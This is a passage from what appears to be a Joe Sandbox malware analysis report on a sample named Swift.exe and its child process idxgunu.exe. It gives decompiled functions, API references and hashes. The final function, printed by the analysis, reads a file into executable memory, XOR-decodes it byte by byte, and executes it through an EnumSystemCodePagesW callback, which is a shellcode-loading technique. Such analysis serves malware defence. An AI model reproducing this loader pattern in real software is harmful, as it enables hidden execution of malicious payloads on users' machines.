				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004056A3(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

0x00405715
0x0040571c
0x0040571f
0x00405724
0x00405737
0x00405751
0x00000000
0x00405751
0x0040573b
0x0040573c
0x0040573f
0x00405740
0x00405748
0x00000000
0x00000000
0x0040574a
0x0040574d
0x00000000
0x00000000
0x00000000
0x0040574d
0x00000000
0x0040572d
0x00000000
0x0040572e

APIs

CharNextA.USER32(004054BE,?,C:\,00000000,00405770,C:\,C:\,?,?,00000000,004054BE,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040571A
CharNextA.USER32(00000000), ref: 0040571F
CharNextA.USER32(00000000), ref: 0040572E

Strings

C:\, xrefs: 0040570D

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: 2a9caa78ea5ad24ed31709241e3ad5854e0d2865484118cf7a19592bf420cc00
Instruction ID: 55b94cf6e1a1abaf001055e45567de5a6eae4a613bc4e2e2ac3dffebcad972b2
Opcode Fuzzy Hash: 2a9caa78ea5ad24ed31709241e3ad5854e0d2865484118cf7a19592bf420cc00
Instruction Fuzzy Hash: 35F02752944A209AEB2232680C44B2B579CCB94360F144833E240B71D1C2FC8C82AFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b034->lfHeight =  ~(MulDiv(E004029EF(2), _t6, 0x48));
				 *0x40b044 = E004029EF(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b04b = 1;
				 *0x40b048 = _t11 & 0x00000001;
				 *0x40b049 = _t11 & 0x00000002;
				 *0x40b04a = _t11 & 0x00000004;
				E00405BA7(_t18, _t24, _t26, 0x40b050,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b034);
				_push(_t14);
				_push(_t26);
				E00405AE3();
				 *0x7a2808 =  *0x7a2808 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024ce
0x00401561
0x00402849
0x004028a4
0x004028b0

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040B034), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: ddd95955e212de25b4088215f62ff8d9f7fd0f08a9394ab430df6fc943b0ab3c
Instruction ID: ed102ab12b44941260a7cf342f3e4bef1943ca650fd1851b6c0bab0e9c734fac
Opcode Fuzzy Hash: ddd95955e212de25b4088215f62ff8d9f7fd0f08a9394ab430df6fc943b0ab3c
Instruction Fuzzy Hash: 19F062B1A49240AFE70167B09F0EBAB3F64D715705F104476F255BA2E3C7BD14048BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402BD4 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BD4(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x795938; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7a278c;
						if(_t2 >  *0x7a278c) {
							_t3 = CreateDialogParamA( *0x7a2780, 0x6f, 0, E00402B51, 0);
							 *0x795938 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F4D(0);
					}
				} else {
					_t6 =  *0x795938; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x795938 = 0;
					return _t6;
				}
			}

0x00402bdb
0x00402bf5
0x00402bfb
0x00402c05
0x00402c0b
0x00402c11
0x00402c22
0x00402c2b
0x00000000
0x00402c30
0x00402c37
0x00402bfd
0x00402c04
0x00402c04
0x00402bdd
0x00402bdd
0x00402be4
0x00402be7
0x00402be7
0x00402bed
0x00402bf4
0x00402bf4

APIs

DestroyWindow.USER32(00000000,00000000,00402DB4,00000001), ref: 00402BE7
GetTickCount.KERNEL32 ref: 00402C05
CreateDialogParamA.USER32(0000006F,00000000,00402B51,00000000), ref: 00402C22
ShowWindow.USER32(00000000,00000005), ref: 00402C30

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: d45161cccb926867ff3673bb5c5a7be3bdbfb01576d68091d09531f05d65685d
Instruction ID: 552949875e4da7b8e9c2f9ed1c3e6bacf77da4849c1ad48c44bf7b4bcf7352ec
Opcode Fuzzy Hash: d45161cccb926867ff3673bb5c5a7be3bdbfb01576d68091d09531f05d65685d
Instruction Fuzzy Hash: 78F05E3080A631EBD6616F14BE8CE9B7B64FB45B21710847BF100F21A4D67C68828FAC

Uniqueness

Uniqueness Score: -1.00%

Function 004038A1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038A1(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405AFC(__ecx, "1033");
				while(1) {
					_t26 =  *0x7a27c4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x7a2790 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x7a27c0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x7a1f60 = _t18[1];
					 *0x7a2828 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x7a1f5c = _t23;
						E00405AE3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x79ed68, E00405BA7(_t13, _t24, _t26, 0x7a1f80, 0xfffffffe));
						_t11 =  *0x7a27ac;
						_t27 =  *0x7a27a8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405BA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x004038a5
0x004038aa
0x004038b0
0x004038b5
0x004038b5
0x004038bd
0x00000000
0x00000000
0x004038c5
0x004038cd
0x004038cf
0x004038d5
0x004038d5
0x004038d7
0x004038e3
0x00000000
0x00000000
0x004038e7
0x00000000
0x00000000
0x00000000
0x004038e9
0x004038ee
0x004038f7
0x004038fd
0x00403902
0x00403916
0x00403921
0x00403939
0x0040393f
0x00403944
0x0040394c
0x0040396d
0x0040396d
0x0040396d
0x0040394e
0x00403950
0x00403950
0x00403954
0x0040395b
0x0040395b
0x00403960
0x00403966
0x00403966
0x00000000
0x00403950
0x00403904
0x00403909
0x00403912
0x0040390b
0x0040390b
0x0040390b
0x00403909

APIs

SetWindowTextA.USER32(00000000,007A1F80), ref: 00403939

Strings

1033, xrefs: 004038A5, 004038AF, 00403920
"C:\Users\user\Desktop\Swift.exe", xrefs: 004038A2

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\Swift.exe"$1033
API String ID: 530164218-1010262903
Opcode ID: 756005061d7de52c02f96b8e8bd19ee8bbff61c1fc280444778421eb6b68fed9
Instruction ID: 61f42a7015a577aa2ae80be16800f984699fd4f2542a356632965b2e5db6e066
Opcode Fuzzy Hash: 756005061d7de52c02f96b8e8bd19ee8bbff61c1fc280444778421eb6b68fed9
Instruction Fuzzy Hash: 0411C675B046119BD720AF59DC809377BACEBC6725724817FE901B73A1C73DAE028B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404DC1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x79ed78 != _t22) {
							 *0x79ed78 = _t22;
							E00405B85(0x79ed90, 0x7a3000);
							E00405AE3(0x7a3000, _t22);
							E0040140B(6);
							E00405B85(0x7a3000, 0x79ed90);
						}
						L11:
						return CallWindowProcA( *0x79ed80, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404740(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E8D(0x413);
				return 0;
			}

0x00404dcd
0x00404df2
0x00404e12
0x00404e15
0x00404e18
0x00404e2f
0x00404e35
0x00404e3c
0x00404e43
0x00404e4a
0x00404e4f
0x00404e55
0x00000000
0x00404e65
0x00404dff
0x00404e52
0x00404e52
0x00000000
0x00404e52
0x00404e0b
0x00404e0d
0x00000000
0x00404e0d
0x00404dd3
0x00000000
0x00000000
0x00404dda
0x00000000

APIs

IsWindowVisible.USER32 ref: 00404DF7
CallWindowProcA.USER32 ref: 00404E65

Part of subcall function 00403E8D: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E9F

Strings

, xrefs: 00404DCF

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ca28d950efb6e80c536d69f6627e8831084bd3b3afcd987938889a0b62f2fb28
Instruction ID: 94f2feba1f7741da4612ef425353269e8a466661a2ba131a43d55855f5c70dc8
Opcode Fuzzy Hash: ca28d950efb6e80c536d69f6627e8831084bd3b3afcd987938889a0b62f2fb28
Instruction Fuzzy Hash: 44116D71500208BBEF21AF51DC40A9B3B29BB85765F00803BFB14792E1C37D9D518BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403543 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403543() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79dd4c;
				_t3 = E00403528(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79dd4c =  *0x79dd4c & 0x00000000;
				return _t3;
			}

0x00403544
0x0040354c
0x00403553
0x00403556
0x00403556
0x00403558
0x0040355d
0x00403564
0x0040356a
0x0040356e
0x0040356f
0x00403577

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,00000000,0040351B,00403324,00000000), ref: 0040355D
GlobalFree.KERNEL32 ref: 00403564

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403555

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: fc1f447dbec254e74a1c6e9050214ae554ef5ae24bd5826d79b2489e2ba1e821
Instruction ID: d704edaf9f1a3a278acd3798aff0e6377ce5515039e21efb38c83ad1a787bb7b
Opcode Fuzzy Hash: fc1f447dbec254e74a1c6e9050214ae554ef5ae24bd5826d79b2489e2ba1e821
Instruction Fuzzy Hash: 3AE0C23390502067C6315F48FC0871E777C6F85B22F01806BE8007B2B083782D424BDD

Uniqueness

Uniqueness Score: -1.00%

Function 004056BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004056c0
0x004056ca
0x004056cc
0x004056d3
0x004056db
0x00000000
0x00000000
0x00000000
0x004056db
0x004056dd
0x004056e2

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CA4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Swift.exe,C:\Users\user\Desktop\Swift.exe,80000000,00000003), ref: 004056C5
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CA4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Swift.exe,C:\Users\user\Desktop\Swift.exe,80000000,00000003), ref: 004056D3

Strings

C:\Users\user\Desktop, xrefs: 004056BF

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 6db6b9915c9cbf21a69eb32334ceabbaadb4e39dfeead832a234b9c76fcb5e97
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 0DD0A7B280CEB02EF30362109C04B9F7A58DF17340F594862F044A61E1C2786C418BFD

Uniqueness

Uniqueness Score: -1.00%

Function 004057D1 Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004057dd
0x004057df
0x00405807
0x004057ec
0x004057f1
0x004057fc
0x00000000
0x00405819
0x00405805
0x00405805
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D8
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057F1
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057FF
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405808

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
Instruction ID: 035960d72c963f4de2d1d5c349936619b3ee1eeed6571489d6775d7860e14968
Opcode Fuzzy Hash: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
Instruction Fuzzy Hash: C8F0A73720DD51AAC2126B255C4496FBF98EF91714F24447AF840F2181D339A8259BBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: idxgunu.exePID: 1980, Parent PID: 4836COMMON

Execution Graph

Execution Coverage:	60.6%
Dynamic/Decrypted Code Coverage:	73.4%
Signature Coverage:	8.1%
Total number of Nodes:	124
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01420227 Relevance: 16.3, APIs: 4, Strings: 5, Instructions: 508
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01420474

Strings

;, xrefs: 0142023D
r, xrefs: 01420249
A, xrefs: 0142035E
-, xrefs: 01420241
s, xrefs: 0142024D

Memory Dump Source

Source File: 00000001.00000002.310555216.0000000001420000.00000040.00001000.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_idxgunu.jbxd

Similarity

API ID: CreateFile
String ID: -$;$A$r$s
API String ID: 823142352-4219510768
Opcode ID: 7c60609d3c54e64b1a0be8e00b622b357d71cd4be257c8b27f7e19cd25fb8981
Instruction ID: 76d9047e4eeba5e2414fe322b22102c385d815e0b6e02bbbd7ef45078751bcf3
Opcode Fuzzy Hash: 7c60609d3c54e64b1a0be8e00b622b357d71cd4be257c8b27f7e19cd25fb8981
Instruction Fuzzy Hash: 3522BA60D5D2E8ADDF06CBF984507FDBFB05F1A201F1845DAE4E1E6282D136834ADB21

Uniqueness

Uniqueness Score: -1.00%

Function 012C1330 Relevance: 42.1, APIs: 22, Strings: 2, Instructions: 142
windowfileregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E012C1330(struct HWND__* __eax, intOrPtr _a8) {
				long _v8;
				void* _v12;
				long _v16;
				struct tagMSG _v44;
				struct _WNDCLASSW _v84;
				void* _t18;
				void* _t22;
				long _t23;
				_Unknown_base(*)()* _t24;
				struct HMENU__* _t38;
				_Unknown_base(*)()* _t53;
				struct _OVERLAPPED* _t55;
				void* _t57;

				_t55 = 0;
				__imp__GetConsoleWindow(); // executed
				ShowWindow(__eax, 0); // executed
				_t18 = malloc(0x3d0900); // executed
				_v12 = _t18;
				if(_t18 != 0) {
					memset(_t18, 0x54, 0x3d0900);
					_t22 = CreateFileW( *(_a8 + 4), 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_t57 = _t22;
					_t23 = GetFileSize(_t57, 0);
					_v8 = _t23;
					_t24 = VirtualAlloc(0, _t23, 0x3000, 0x40); // executed
					_t53 = _t24;
					ReadFile(_t57, _t53, _v8,  &_v16, 0); // executed
					do {
						 *((char*)(_t53 + _t55)) = (( *((intOrPtr*)(_t53 + _t55)) - 0x00000061 ^ 0x0000005e) + 0x0000002b ^ 0x000000a8) + 0x24;
						_t55 =  &(_t55->Internal);
					} while (_t55 < _v8);
					EnumSystemCodePagesW(_t53, 0); // executed
					free(_v12);
					L012C1539();
					 *0x12c30bc = 0;
					 *0x12c30cc = 1;
					 *0x12c30d8 = 1;
					if(RegisterClassW( &_v84) != 0) {
						 *0x12c30e4 = 0xc8;
						 *0x12c30e0 = 0xc8;
